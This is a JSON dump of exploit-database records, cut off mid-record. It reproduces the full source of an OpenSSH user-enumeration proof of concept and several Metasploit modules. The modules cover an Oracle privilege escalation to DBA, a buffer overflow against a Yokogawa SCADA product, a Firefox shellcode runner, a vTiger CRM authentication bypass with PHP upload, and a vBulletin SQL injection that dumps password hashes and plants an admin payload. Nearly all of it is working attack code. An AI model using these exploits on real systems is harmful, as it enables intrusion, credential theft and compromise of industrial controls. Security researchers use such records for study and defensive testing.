"exploit", "description": "OpenSSHD <= 7.2p2 - User Enumeration. CVE-2016-6210. Remote exploit for Linux platform", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "id": "EDB-ID:40113", "href": "https://www.exploit-db.com/exploits/40113/", "type": "exploitdb", "title": "OpenSSHD <= 7.2p2 - User Enumeration", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n\r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n\r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n\r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n\r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n\r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n\r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n\r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n\r\n(Valid users will result in higher total time).\r\n\r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n\r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n\r\nEddie Harari", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40113/"}], "metasploit": [{"lastseen": "2019-11-21T16:32:13", "bulletinFamily": "exploit", "description": "This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique.\n", "modified": "2018-12-10T17:21:16", "published": "2017-08-07T03:07:46", "id": "MSF:AUXILIARY/ADMIN/ORACLE/ORACLE_INDEX_PRIVESC", "href": "", "type": "metasploit", "title": "Oracle DB Privilege Escalation via Function-Based Index", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB Privilege Escalation via Function-Based Index',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.\n },\n 'Author' =>\n [\n 'David Litchfield', # Vulnerability discovery and exploit\n 'Moshe Kaplan', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf' ],\n ],\n 'DisclosureDate' => 'Jan 21 2015'))\n\n register_options(\n [\n OptString.new('SQL', [ true, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\" ]),\n OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]),\n ])\n end\n\n def run\n return unless check_dependencies\n\n func_name = Rex::Text.rand_text_alpha(6..10)\n\n create_function = <<-EOF\n CREATE OR REPLACE FUNCTION #{func_name}\n (FOO varchar) return varchar\n deterministic authid current_user is\n pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL'].gsub(\"'\", \"\\\\\\\\'\")}';\n commit;\n return '';\n end;\n EOF\n\n index_name = Rex::Text.rand_text_alpha(6..10)\n param_value = Rex::Text.rand_text_alpha(2..6)\n\n create_index = \"CREATE INDEX #{index_name} ON \" \\\n \"#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))\"\n\n trigger = \"SELECT * FROM #{datastore['TABLE']}\"\n\n clean_index = \"drop index #{index_name}\"\n clean_func = \"drop function #{func_name}\"\n\n print_status('Running exploit...')\n\n begin\n print_status(\"Attempting to create function #{func_name}...\")\n prepare_exec(create_function)\n print_status(\"Attempting to create index #{index_name}...\")\n prepare_exec(create_index)\n print_status('Querying to trigger function...')\n prepare_exec(trigger)\n print_status('Cleaning up index...')\n prepare_exec(clean_index)\n print_status('Cleaning up function...')\n prepare_exec(clean_func)\n print_status('Exploit complete!')\n rescue ::OCIError => e\n print_error(\"Error! #{e.message}\")\n end\n end\n\n def prepare_exec(query)\n print_status(query)\n super\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/oracle_index_privesc.rb"}, {"lastseen": "2019-12-05T07:30:08", "bulletinFamily": "exploit", "description": "This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create logs using functions like vsprintf and memcpy in an insecure way. This module has been tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.\n", "modified": "2017-09-17T20:00:04", "published": "2014-07-07T16:20:49", "id": "MSF:EXPLOIT/WINDOWS/SCADA/YOKOGAWA_BKFSIM_VHFD", "href": "", "type": "metasploit", "title": "Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create\n logs using functions like vsprintf and memcpy in an insecure way. This module has been\n tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.\n },\n 'Author' =>\n [\n 'Redsadic <julian.vilas[at]gmail.com>',\n 'juan vazquez'\n ],\n 'References' =>\n [\n ['CVE', '2014-3888'],\n ['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],\n ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']\n ],\n 'Payload' =>\n {\n 'Space' => 1770, # 2228 (max packet length) - 16 (header) - (438 target['Offset']) - 4 (ret)\n 'DisableNops' => true,\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',\n {\n 'Ret' => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll\n 'Offset' => 438\n }\n ],\n ],\n 'DisclosureDate' => 'May 23 2014',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(20010)\n ])\n end\n\n def exploit\n connect_udp\n\n sploit = \"\\x45\\x54\\x56\\x48\\x01\\x01\\x10\\x09\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x44\" # header\n sploit << rand_text(target['Offset'])\n sploit << [target.ret].pack(\"V\")\n sploit << payload.encoded\n\n print_status(\"Trying target #{target.name}, sending #{sploit.length} bytes...\")\n udp_sock.put(sploit)\n\n disconnect_udp\n end\nend\n\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb"}, {"lastseen": "2019-10-21T09:44:55", "bulletinFamily": "exploit", "description": "This module allows execution of native payloads from a privileged Firefox Javascript shell. It places the specified payload into memory, adds the necessary protection flags, and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter session without touching the disk.\n", "modified": "2017-07-24T13:26:21", "published": "2014-02-17T21:31:45", "id": "MSF:EXPLOIT/FIREFOX/LOCAL/EXEC_SHELLCODE", "href": "", "type": "metasploit", "title": "Firefox Exec Shellcode from Privileged Javascript Shell", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/firefox'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking # Missing autodetection, but has widespread targetability\n\n include Msf::Payload::Firefox\n include Msf::Exploit::Remote::FirefoxPrivilegeEscalation\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',\n 'Description' => %q{\n This module allows execution of native payloads from a privileged Firefox Javascript shell.\n It places the specified payload into memory, adds the necessary protection flags,\n and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter\n session without touching the disk.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'joev' ],\n 'Platform' => [ 'firefox' ],\n 'DisclosureDate' => 'Mar 10 2014',\n 'Targets' => [\n [\n 'Native Payload', {\n 'Platform' => %w{ linux osx win unix },\n 'Arch' => ARCH_ALL\n }\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptInt.new('TIMEOUT', [true, \"Maximum time (seconds) to wait for a response\", 90])\n ])\n end\n\n def exploit\n print_status \"Running the Javascript shell...\"\n session.shell_write(\"[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]\")\n results = session.shell_read_until_token(\"[!JAVASCRIPT]\", 0, datastore['TIMEOUT'])\n print_warning(results) if results.present?\n end\n\n def js_payload\n %Q|\n (function(send){\n try {\n #{run_payload}\n send(\"Payload executed.\");\n } catch (e) {\n send(e);\n }\n })(send);\n |.strip\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/firefox/local/exec_shellcode.rb"}, {"lastseen": "2019-11-17T10:40:27", "bulletinFamily": "exploit", "description": "vTiger CRM allows a user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.\n", "modified": "2017-09-08T01:18:50", "published": "2014-01-02T17:25:52", "id": "MSF:EXPLOIT/MULTI/HTTP/VTIGER_SOAP_UPLOAD", "href": "", "type": "metasploit", "title": "vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include REXML\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',\n 'Description' => %q{\n vTiger CRM allows a user to bypass authentication when requesting SOAP services.\n In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP\n service. By combining both vulnerabilities an attacker can upload and execute PHP\n code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu\n 10.04 and Windows 2003 SP2.\n },\n 'Author' =>\n [\n 'Egidio Romano', # Vulnerability discovery\n 'juan vazquez' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-3214' ],\n [ 'CVE', '2013-3215' ],\n [ 'OSVDB', '95902' ],\n [ 'OSVDB', '95903' ],\n [ 'BID', '61558' ],\n [ 'BID', '61559' ],\n [ 'EDB', '27279' ],\n [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],\n [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Payload' =>\n {\n # Arbitrary big number. The payload is sent base64 encoded\n # into a POST SOAP request\n 'Space' => 262144, # 256k\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'vTigerCRM v5.4.0', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 26 2013'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base vTiger CRM directory path\", '/vtigercrm/'])\n ])\n end\n\n def check\n test_one = check_email_soap(\"admin\", rand_text_alpha(4 + rand(4)))\n res = send_soap_request(test_one)\n\n unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil=\"true\" xsi:type=\"xsd:string\"\\/>/\n return Exploit::CheckCode::Unknown\n end\n\n test_two = check_email_soap(\"admin\")\n res = send_soap_request(test_two)\n\n if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type=\"xsd:string\">.*<\\/return>/)\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n file_name = rand_text_alpha(rand(10)+6) + '.php'\n php = %Q|<?php #{payload.encoded} ?>|\n\n soap = add_attachment_soap(file_name, php)\n res = send_soap_request(soap)\n\n print_status(\"Uploading payload...\")\n if res and res.code == 200 and res.body.to_s =~ /<return xsi:type=\"xsd:string\">.*<\\/return>/\n print_good(\"Upload successfully uploaded\")\n register_files_for_cleanup(file_name)\n else\n fail_with(Failure::Unknown, \"#{peer} - Upload failed\")\n end\n\n print_status(\"Executing payload...\")\n send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0)\n end\n\n def add_attachment_soap(file_name, file_data)\n xml = Document.new\n xml.add_element(\n \"soapenv:Envelope\",\n {\n 'xmlns:xsi' => \"http://www.w3.org/2001/XMLSchema-instance\",\n 'xmlns:xsd' => \"http://www.w3.org/2001/XMLSchema\",\n 'xmlns:soapenv' => \"http://schemas.xmlsoap.org/soap/envelope/\",\n 'xmlns:crm' => \"http://www.vtiger.com/products/crm\"\n })\n xml.root.add_element(\"soapenv:Header\")\n xml.root.add_element(\"soapenv:Body\")\n body = xml.root.elements[2]\n body.add_element(\n \"crm:AddEmailAttachment\",\n {\n 'soapenv:encodingStyle' => \"http://schemas.xmlsoap.org/soap/encoding/\"\n })\n crm = body.elements[1]\n crm.add_element(\"emailid\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"filedata\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"filename\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"filesize\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"filetype\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"username\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"session\", {'xsi:type' => 'xsd:string'})\n crm.elements['emailid'].text = rand_text_alpha(4+rand(4))\n crm.elements['filedata'].text = \"MSF_PAYLOAD\"\n crm.elements['filename'].text = \"MSF_FILENAME\"\n crm.elements['filesize'].text = file_data.length.to_s\n crm.elements['filetype'].text = \"php\"\n crm.elements['username'].text = rand_text_alpha(4+rand(4))\n\n xml_string = xml.to_s\n xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))\n xml_string.gsub!(/MSF_FILENAME/, \"../../../../../../#{file_name}\")\n\n return xml_string\n end\n\n def check_email_soap(user_name = \"\", session = \"\")\n xml = Document.new\n xml.add_element(\n \"soapenv:Envelope\",\n {\n 'xmlns:xsi' => \"http://www.w3.org/2001/XMLSchema-instance\",\n 'xmlns:xsd' => \"http://www.w3.org/2001/XMLSchema\",\n 'xmlns:soapenv' => \"http://schemas.xmlsoap.org/soap/envelope/\",\n 'xmlns:crm' => \"http://www.vtiger.com/products/crm\"\n })\n xml.root.add_element(\"soapenv:Header\")\n xml.root.add_element(\"soapenv:Body\")\n body = xml.root.elements[2]\n body.add_element(\n \"crm:CheckEmailPermission\",\n {\n 'soapenv:encodingStyle' => \"http://schemas.xmlsoap.org/soap/encoding/\"\n })\n crm = body.elements[1]\n crm.add_element(\"username\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"session\", {'xsi:type' => 'xsd:string'})\n crm.elements['username'].text = user_name\n crm.elements['session'].text = session\n\n xml.to_s\n end\n\n def send_soap_request(soap_data)\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'vtigerservice.php'),\n 'method' => 'POST',\n 'vars_get' => { 'service' => 'outlook' },\n 'ctype' => 'text/xml; charset=UTF-8',\n 'data' => soap_data\n })\n\n return res\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vtiger_soap_upload.rb"}, {"lastseen": "2019-10-09T01:53:57", "bulletinFamily": "exploit", "description": "This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module uses the sqli to extract the web application's usernames and hashes. With the retrieved information tries to log into the admin control panel in order to deploy the PHP payload. This module has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu Linux distribution.\n", "modified": "2017-07-24T13:26:21", "published": "2013-12-06T19:50:12", "id": "MSF:EXPLOIT/UNIX/WEBAPP/VBULLETIN_VOTE_SQLI_EXEC", "href": "", "type": "metasploit", "title": "vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',\n 'Description' => %q{\n This module exploits a SQL injection vulnerability found in vBulletin 5 that has\n been used in the wild since March 2013. This module uses the sqli to extract the\n web application's usernames and hashes. With the retrieved information tries to\n log into the admin control panel in order to deploy the PHP payload. This module\n has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu\n Linux distribution.\n },\n 'Author' =>\n [\n 'Orestis Kourides', # Vulnerability discovery and PoC\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-3522' ],\n [ 'OSVDB', '92031' ],\n [ 'EDB', '24882' ],\n [ 'BID', '58754' ],\n [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 10000 # Just value big enough to fit any php payload\n },\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],\n 'DisclosureDate' => 'Mar 25 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new(\"TARGETURI\", [true, 'The path to vBulletin', '/']),\n OptInt.new(\"NODE\", [false, 'Valid Node ID']),\n OptInt.new(\"MINNODE\", [true, 'Valid Node ID', 1]),\n OptInt.new(\"MAXNODE\", [true, 'Valid Node ID', 100])\n ])\n end\n\n def exists_node?(id)\n mark = rand_text_alpha(8 + rand(5))\n result = do_sqli(id, \"select '#{mark}'\")\n\n if result and result =~ /#{mark}/\n return true\n end\n\n return false\n end\n\n def brute_force_node\n min = datastore[\"MINNODE\"]\n max = datastore[\"MAXNODE\"]\n\n if min > max\n print_error(\"MINNODE can't be major than MAXNODE\")\n return nil\n end\n\n for node_id in min..max\n if exists_node?(node_id)\n return node_id\n end\n end\n\n return nil\n end\n\n def get_node\n if datastore['NODE'].nil? or datastore['NODE'] <= 0\n print_status(\"Brute forcing to find a valid node id...\")\n return brute_force_node\n end\n\n print_status(\"Checking node id #{datastore['NODE']}...\")\n if exists_node?(datastore['NODE'])\n return datastore['NODE']\n else\n return nil\n end\n end\n\n def do_sqli(node, query)\n mark = Rex::Text.rand_text_alpha(5 + rand(3))\n random_and = Rex::Text.rand_text_numeric(4)\n injection = \") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) \"\n injection << \"from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) \"\n injection << \"AND (#{random_and}=#{random_and}\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"ajax\", \"api\", \"reputation\", \"vote\"),\n 'vars_post' =>\n {\n 'nodeid' => \"#{node}#{injection}\",\n }\n })\n\n unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/\n return nil\n end\n\n data = \"\"\n\n if res.body.to_s =~ /#{mark}(.*)#{mark}/\n data = $1\n end\n\n return data\n end\n\n def get_user_data(node_id, user_id)\n user = do_sqli(node_id, \"select username from user limit #{user_id},#{user_id+1}\")\n pass = do_sqli(node_id, \"select password from user limit #{user_id},#{user_id+1}\")\n salt = do_sqli(node_id, \"select salt from user limit #{user_id},#{user_id+1}\")\n\n return [user, pass, salt]\n end\n\n def do_login(user, hash)\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"login.php\"),\n 'method' => 'POST',\n 'encode_params' => false,\n 'vars_get' => {\n 'do' => 'login'\n },\n 'vars_post' => {\n 'url' => '%2Fadmincp%2F',\n 'securitytoken' => 'guest',\n 'logintype' => 'cplogin',\n 'do' => 'login',\n 'vb_login_md5password' => hash,\n 'vb_login_md5password_utf' => hash,\n 'vb_login_username' => user,\n 'vb_login_password' => '',\n 'cssprefs' => ''\n }\n })\n\n if res and res.code == 200 and res.body and res.body.to_s =~ /window\\.location.*admincp/ and !res.get_cookies.empty?\n session = res.get_cookies\n else\n return nil\n end\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"admincp\", \"/\"),\n 'cookie' => session\n })\n\n if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\\/title>/\n return session\n else\n return nil\n end\n\n end\n\n def get_token(response)\n token_info = {\n :session_hash => \"\",\n :security_token => \"\",\n :admin_hash => \"\"\n }\n\n if response =~ /var SESSIONHASH = \"([0-9a-f]+)\";/\n token_info[:session_hash] = $1\n end\n\n if response =~ /var ADMINHASH = \"([0-9a-f]+)\";/\n token_info[:admin_hash] = $1\n end\n\n if response =~ /var SECURITYTOKEN = \"([0-9a-f\\-]+)\";/\n token_info[:security_token] = $1\n end\n\n return token_info\n end\n\n def get_install_token\n res = send_request_cgi({\n \"uri\" => normalize_uri(target_uri.path, \"admincp\", \"product.php\"),\n \"vars_get\" => {\n \"do\" => \"productadd\"\n },\n \"cookie\" => @session\n })\n\n unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/\n return nil\n end\n\n\n return get_token(res.body.to_s)\n end\n\n def install_product(token_info)\n\n xml_product = <<-EOF\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n\n<product productid=\"#{@product_id}\" active=\"0\">\n <title>#{@product_id}</title>\n <description>#{@product_id}</description>\n <version>1.0</version>\n <url>http://#{@product_id}.loc</url>\n <versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>\n <dependencies>\n <dependency dependencytype=\"vbulletin\" minversion=\"\" maxversion=\"\" />\n </dependencies>\n <codes>\n <code version=\"*\">\n <installcode>\n <![CDATA[\n #{payload.encoded}\n ]]>\n </installcode>\n <uninstallcode />\n </code>\n </codes>\n <templates>\n </templates>\n <stylevardfns>\n </stylevardfns>\n <stylevars>\n </stylevars>\n <hooks>\n </hooks>\n <phrases>\n </phrases>\n <options>\n </options>\n <helptopics>\n </helptopics>\n <cronentries>\n </cronentries>\n <faqentries>\n </faqentries>\n <widgets>\n </widgets>\n</product>\n EOF\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(token_info[:session_hash], nil, nil, \"form-data; name=\\\"s\\\"\")\n post_data.add_part(\"productimport\", nil, nil, \"form-data; name=\\\"do\\\"\")\n post_data.add_part(token_info[:admin_hash], nil, nil, \"form-data; name=\\\"adminhash\\\"\")\n post_data.add_part(token_info[:security_token], nil, nil, \"form-data; name=\\\"securitytoken\\\"\")\n post_data.add_part(xml_product, \"text/xml\", nil, \"form-data; name=\\\"productfile\\\"; filename=\\\"product_juan2.xml\\\"\")\n post_data.add_part(\"\", nil, nil, \"form-data; name=\\\"serverfile\\\"\")\n post_data.add_part(\"1\", nil, nil, \"form-data; name=\\\"allowoverwrite\\\"\")\n post_data.add_part(\"999999999\", nil, nil, \"form-data; name=\\\"MAX_FILE_SIZE\\\"\")\n\n data = post_data.to_s\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"admincp\", \"product.php\"),\n 'method' => \"POST\",\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'cookie' => @session,\n 'vars_get' => {\n \"do\" => \"productimport\"\n },\n 'data' => data\n })\n\n if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/\n return true\n elsif res\n fail_with(Failure::Unknown, \"#{peer} - Error when trying to install the product.\")\n else\n return false\n end\n\n end\n\n def get_delete_token\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"admincp\", \"product.php\"),\n 'cookie' => @session,\n 'vars_get' => {\n \"do\" => \"productdelete\",\n \"productid\" => @product_id,\n \"s\" => @session_hash\n }\n })\n\n if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/\n return get_token(res.body.to_s)\n end\n\n return nil\n end\n\n def delete_product(token_info)\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"admincp\", \"product.php\"),\n 'method' => \"POST\",\n 'cookie' => @session,\n 'vars_get' => {\n \"do\" => \"productkill\"\n },\n 'vars_post' => {\n \"s\" => token_info[:session_hash],\n \"do\" => \"productkill\",\n \"adminhash\" => token_info[:admin_hash],\n \"securitytoken\" => token_info[:security_token],\n \"productid\" => @product_id\n }\n })\n\n if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/\n return true\n end\n\n return false\n end\n\n def check\n node_id = get_node\n\n unless node_id.nil?\n return Msf::Exploit::CheckCode::Appears\n end\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"index.php\")\n })\n\n if res and res.code == 200 and res.body.to_s =~ /\"simpleversion\": \"v=5/\n return Msf::Exploit::CheckCode::Appears\n end\n\n return Msf::Exploit::CheckCode::Safe\n end\n\n def on_new_session(session)\n print_status(\"Getting the uninstall token info...\")\n delete_token = get_delete_token\n if delete_token.nil?\n print_error(\"Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...\")\n return\n end\n\n print_status(\"Deleting the product #{@product_id}...\")\n if delete_product(delete_token)\n print_good(\"Product #{@product_id} deleted\")\n else\n print_error(\"Failed uninstall the product #{@product_id}, should be done manually...\")\n end\n end\n\n def exploit\n print_status(\"Checking for a valid node id...\")\n node_id = get_node\n if node_id.nil?\n print_error(\"node id not found\")\n return\n end\n\n print_good(\"Using node id #{node_id} to exploit sqli... Counting users...\")\n data = do_sqli(node_id, \"select count(*) from user\")\n if data.empty?\n print_error(\"Error exploiting sqli\")\n return\n end\n count_users = data.to_i\n users = []\n print_good(\"#{count_users} users found\")\n\n for i in 0..count_users - 1\n user = get_user_data(node_id, i)\n connection_details = {\n module_fullname: self.fullname,\n username: user[0],\n private_data: user[1],\n private_type: :nonreplayable_hash,\n jtr_format: 'md5,raw-md5',\n proof: \"salt: #{user[2]}\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n\n # why is this stored another way?\n report_auth_info({\n :host => rhost,\n :port => rport,\n :user => user[0],\n :pass => user[1],\n :type => \"hash\",\n :sname => (ssl ? \"https\" : \"http\"),\n :proof => \"salt: #{user[2]}\" # Using proof to store the hash salt\n })\n users << user\n end\n\n @session = nil\n users.each do |user|\n print_status(\"Trying to log into vBulletin admin control panel as #{user[0]}...\")\n @session = do_login(user[0], user[1])\n unless @session.blank?\n print_good(\"Logged in successfully as #{user[0]}\")\n break\n end\n end\n\n if @session.blank?\n fail_with(Failure::NoAccess, \"#{peer} - Failed to log into the vBulletin admin control panel\")\n end\n\n print_status(\"Getting the install product security token...\")\n install_token = get_install_token\n if install_token.nil?\n fail_with(Failure::Unknown, \"#{peer} - Failed to get the install token\")\n end\n\n @session_hash = install_token[:session_hash]\n @product_id = rand_text_alpha_lower(5 + rand(8))\n print_status(\"Installing the malicious product #{@product_id}...\")\n if install_product(install_token)\n print_good(\"Product successfully installed... payload should be executed...\")\n else\n # Two situations trigger this path:\n # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often.\n # 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.\n # Because of that fail_with isn't used here.\n return\n end\n\n print_status(\"Getting the uninstall token info...\")\n delete_token = get_delete_token\n if delete_token.nil?\n print_error(\"Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...\")\n return\n end\n\n print_status(\"Deleting the product #{@product_id}...\")\n if delete_product(delete_token)\n print_good(\"Product #{@product_id} deleted\")\n else\n print_error(\"Failed uninstall the product #{@product_id}, should be done manually...\")\n end\n\n end\n\n\nend\n", "cvss": {"score": 